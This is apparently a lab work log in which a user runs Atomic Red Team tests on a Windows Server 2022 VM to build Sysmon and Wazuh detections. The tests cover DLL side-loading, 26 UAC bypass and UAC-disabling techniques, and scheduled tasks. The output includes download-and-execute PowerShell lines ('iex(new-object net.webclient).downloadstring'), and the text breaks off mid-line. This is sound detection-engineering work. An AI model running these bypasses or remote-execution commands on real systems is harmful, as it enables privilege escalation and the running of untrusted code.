```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1574.002 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Attempting to satisfy prereq: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe) Prereq already met: Gup.exe binary must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1574.002\bin\GUP.exe) GetPrereq's for: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable Attempting to satisfy prereq: .Net SDK must be installed Prereq already met: .Net SDK must be installed Attempting to satisfy prereq: preloader must exist Prereq already met: preloader must exist ```

Test run

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1574.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Exit code: -1073741515 Done executing test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable Unhandled exception. System.ArgumentException: The startup hook simple assembly name '"C:\AtomicRedTeam\atomics\T1574.002\bin\preloader.dll" ' is invalid. It must be a valid assembly name and it may not contain directory separator, space or comma characters and must not end with '.dll'. at System.StartupHookProvider.ParseStartupHook(StartupHookNameOrPath& startupHook, String startupHookPart) at System.StartupHookProvider.ProcessStartupHooks(String diagnosticStartupHooks) Exit code: 0 Done executing test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable ```

Cleanup

```console PS C:\Users\vagrant\Sysmon> Invoke-AtomicTest T1574.002 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Done executing cleanup for test: T1574.002-1 DLL Side-Loading using the Notepad++ GUP.exe binary Executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable Done executing cleanup for test: T1574.002-2 DLL Side-Loading using the dotnet startup hook environment variable ```

Sysmon event log


Dashboard event

 

[LucioDonda]

~While working on the issue face a problem on the vagrant after which I couldn't finish the procedure: While working on a solution I'm asking for aws instances.~

Found a way of continuing through the virtualbox machines, will continue that way.

[LucioDonda]

Emulation of ATT&CK techniques and detection with Wazuh 🟢

Setting up the environment [Agent server 2022] 🟢

Sysmon configuration

Mapping Sysmon rules with MITRE attack techniques

```console PS C:\Users\vagrant\Desktop\Sysmon> .\Sysmon.exe -accepteula -i sysmonconfig.xml System Monitor v15.14 - System activity monitor By Mark Russinovich and Thomas Garnier Copyright (C) 2014-2024 Microsoft Corporation Using libxml2. libxml2 is Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved. Sysinternals - www.sysinternals.com Loading configuration file with schema version 4.60 Sysmon schema version: 4.90 Configuration file validated. Sysmon installed. SysmonDrv installed. Starting SysmonDrv. SysmonDrv started. Starting Sysmon.. Sysmon started. ```

Capture Sysmon

Modify ossec.conf

<localfile>
  <location>Microsoft-Windows-Sysmon/Operational</location>
  <log_format>eventchannel</log_format>
</localfile>

Setting up the environment [windows server 2022] 🟢

ART Execution Framework and Atomics folder installation

```console PS C:\Users\vagrant\Desktop\Sysmon> IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing); PS C:\Users\vagrant\Desktop\Sysmon> Install-AtomicRedTeam -getAtomics Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function See Wiki at https://github.com/redcanaryco/invoke-atomicredteam/wiki for complete details ```

Importing the ART module

```console PS C:\Users\vagrant\Desktop\Sysmon> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force ```

Get details of a particular technique

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -ShowDetailsBrief PathToAtomicsFolder = C:\AtomicRedTeam\atomics T1548.002-1 Bypass UAC using Event Viewer (cmd) T1548.002-2 Bypass UAC using Event Viewer (PowerShell) T1548.002-3 Bypass UAC using Fodhelper T1548.002-4 Bypass UAC using Fodhelper - PowerShell T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) T1548.002-6 Bypass UAC by Mocking Trusted Directories T1548.002-7 Bypass UAC using sdclt DelegateExecute T1548.002-8 Disable UAC using reg.exe T1548.002-9 Bypass UAC using SilentCleanup task T1548.002-10 UACME Bypass Method 23 T1548.002-11 UACME Bypass Method 31 T1548.002-12 UACME Bypass Method 33 T1548.002-13 UACME Bypass Method 34 T1548.002-14 UACME Bypass Method 39 T1548.002-15 UACME Bypass Method 56 T1548.002-16 UACME Bypass Method 59 T1548.002-17 UACME Bypass Method 61 T1548.002-18 WinPwn - UAC Magic T1548.002-19 WinPwn - UAC Bypass ccmstp technique T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key T1548.002-23 UAC Bypass with WSReset Registry Modification T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key T1548.002-25 Disable UAC notification via registry keys T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Check/Get prerequisites of a technique

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd) Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd) CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe Prerequisites met: T1548.002-8 Disable UAC using reg.exe CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task CheckPrereq's for: T1548.002-10 UACME Bypass Method 23 Prerequisites not met: T1548.002-10 UACME Bypass Method 23 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-11 UACME Bypass Method 31 Prerequisites not met: T1548.002-11 UACME Bypass Method 31 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-12 UACME Bypass Method 33 Prerequisites not met: T1548.002-12 UACME Bypass Method 33 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-13 UACME Bypass Method 34 Prerequisites not met: T1548.002-13 UACME Bypass Method 34 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-14 UACME Bypass Method 39 Prerequisites not met: T1548.002-14 UACME Bypass Method 39 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-15 UACME Bypass Method 56 Prerequisites not met: T1548.002-15 UACME Bypass Method 56 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-16 UACME Bypass Method 59 Prerequisites not met: T1548.002-16 UACME Bypass Method 59 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-17 UACME Bypass Method 61 Prerequisites not met: T1548.002-17 UACME Bypass Method 61 [*] UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe") Try installing prereq's with the -GetPrereqs switch CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic Prerequisites met: T1548.002-18 WinPwn - UAC Magic CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys Prerequisites met: T1548.002-25 Disable UAC notification via registry keys CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -GetPrereqs PathToAtomicsFolder=C:\AtomicRedTeam\atomics GetPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd) No Preqs Defined GetPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) No Preqs Defined GetPrereq's for: T1548.002-3 Bypass UAC using Fodhelper No Preqs Defined GetPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell No Preqs Defined GetPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) No Preqs Defined GetPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories No Preqs Defined GetPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute No Preqs Defined GetPrereq's for: T1548.002-8 Disable UAC using reg.exe No Preqs Defined GetPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task No Preqs Defined GetPrereq's for: T1548.002-10 UACME Bypass Method 23 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe") Prereq successfully met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\23 Akagi64.exe") GetPrereq's for: T1548.002-11 UACME Bypass Method 31 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\31 Akagi64.exe") GetPrereq's for: T1548.002-12 UACME Bypass Method 33 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\33 Akagi64.exe") GetPrereq's for: T1548.002-13 UACME Bypass Method 34 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\34 Akagi64.exe") GetPrereq's for: T1548.002-14 UACME Bypass Method 39 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\39 Akagi64.exe") GetPrereq's for: T1548.002-15 UACME Bypass Method 56 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\56 Akagi64.exe") GetPrereq's for: T1548.002-16 UACME Bypass Method 59 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\59 Akagi64.exe") GetPrereq's for: T1548.002-17 UACME Bypass Method 61 Attempting to satisfy prereq: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe") Prereq already met: UACME executable must exist on disk at specified location ("C:\AtomicRedTeam\atomics\..\ExternalPayloads\uacme\61 Akagi64.exe") GetPrereq's for: T1548.002-18 WinPwn - UAC Magic No Preqs Defined GetPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique No Preqs Defined GetPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique No Preqs Defined GetPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique No Preqs Defined GetPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key No Preqs Defined GetPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification No Preqs Defined GetPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key No Preqs Defined GetPrereq's for: T1548.002-25 Disable UAC notification via registry keys No Preqs Defined GetPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys No Preqs Defined ```

Run the test for a particular technique

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout The operation completed successfully. Microsoft Windows [Version 10.0.20348.2322] (c) Microsoft Corporation. All rights reserved. C:\Users\vagrant\AppData\Local\Temp\1> Exit code: 0 Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open Name Property ---- ----- command Exit code: 0 Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing test: T1548.002-3 Bypass UAC using Fodhelper Exception calling "Start" with "0" argument(s): "Access is denied" At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17 + $process.Start() > $null + ~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : Win32Exception Exit code: Done executing test: T1548.002-3 Bypass UAC using Fodhelper Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories 1 file(s) copied. symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe Exit code: 0 Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Exit code: 0 Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Exit code: 0 Done executing test: T1548.002-8 Disable UAC using reg.exe Executing test: T1548.002-9 Bypass UAC using SilentCleanup task The screen cannot be set to the number of lines and columns specified. The operation completed successfully. Access is denied. Exit code: 0 Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task Executing test: T1548.002-10 UACME Bypass Method 23 Exit code: 1073741845 Done executing test: T1548.002-10 UACME Bypass Method 23 Executing test: T1548.002-11 UACME Bypass Method 31 Exit code: 1073741845 Done executing test: T1548.002-11 UACME Bypass Method 31 Executing test: T1548.002-12 UACME Bypass Method 33 Exit code: 1073741845 Done executing test: T1548.002-12 UACME Bypass Method 33 Executing test: T1548.002-13 UACME Bypass Method 34 Exit code: 1073741845 Done executing test: T1548.002-13 UACME Bypass Method 34 Executing test: T1548.002-14 UACME Bypass Method 39 Exit code: 1073741845 Done executing test: T1548.002-14 UACME Bypass Method 39 Executing test: T1548.002-15 UACME Bypass Method 56 Exit code: 1073741845 Done executing test: T1548.002-15 UACME Bypass Method 56 Executing test: T1548.002-16 UACME Bypass Method 59 Exit code: 1073741845 Done executing test: T1548.002-16 UACME Bypass Method 59 Executing test: T1548.002-17 UACME Bypass Method 61 Exit code: 1073741845 Done executing test: T1548.002-17 UACME Bypass Method 61 Executing test: T1548.002-18 WinPwn - UAC Magic iex : At line:1 char:1 + # Global TLS Setting for all functions. If TLS12 isn't suppported yo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:2 char:1 + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:3 char:1 + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ... + ~~~~~~~~~ + CategoryInfo : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException Exit code: 0 Done executing test: T1548.002-18 WinPwn - UAC Magic Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique iex : At line:1 char:1 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:2 char:1 + # Global TLS Setting for all functions. If TLS12 isn't suppported yo ... + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:3 char:1 + UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -te ... + ~~~~~~~~~ + CategoryInfo : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException Exit code: 0 Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique iex : At line:1 char:1 + # Global TLS Setting for all functions. If TLS12 isn't suppported yo ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:2 char:1 + iex(new-object net.webclient).downloadstring('https://raw.githubuserc ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand UACBypass : The term 'UACBypass' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:3 char:1 + UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -tec ... + ~~~~~~~~~ + CategoryInfo : ObjectNotFound: (UACBypass:String) [], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException Exit code: 0 Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique iex : At line:1 char:1 + function dccuacbypass + ~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. At line:1 char:4 + & {iex(new-object net.webclient).downloadstring('https://raw.githubus ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand Exit code: 0 Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Exit code: 0 Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Exit code: 0 Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Exit code: 0 Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-25 Disable UAC notification via registry keys Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Clean-up on completion of the test

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Done executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Done executing cleanup for test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-25 Disable UAC notification via registry keys Executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Done executing cleanup for test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Attack emulation with ART [Agent server 2022] 🟢

T1053.005 – Scheduled Task/Job

GetPrereqs

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1053.005 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1053.005-1 Scheduled Task Startup Script No Preqs Defined GetPrereq's for: T1053.005-2 Scheduled task Local No Preqs Defined GetPrereq's for: T1053.005-3 Scheduled task Remote No Preqs Defined GetPrereq's for: T1053.005-4 Powershell Cmdlet Scheduled Task No Preqs Defined GetPrereq's for: T1053.005-5 Task Scheduler via VBA Attempting to satisfy prereq: Microsoft Word must be installed You will need to install Microsoft Word manually to meet this requirement Failed to meet prereq: Microsoft Word must be installed GetPrereq's for: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml) Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_005_WMI.xml) GetPrereq's for: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry No Preqs Defined GetPrereq's for: T1053.005-8 Import XML Schedule Task with Hidden Attribute Attempting to satisfy prereq: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml) Prereq already met: File to copy must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml) GetPrereq's for: T1053.005-9 PowerShell Modify A Scheduled Task No Preqs Defined GetPrereq's for: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation Attempting to satisfy prereq: PsExec tool from Sysinternals must exist in the ExternalPayloads directory Prereq successfully met: PsExec tool from Sysinternals must exist in the ExternalPayloads directory Attempting to satisfy prereq: 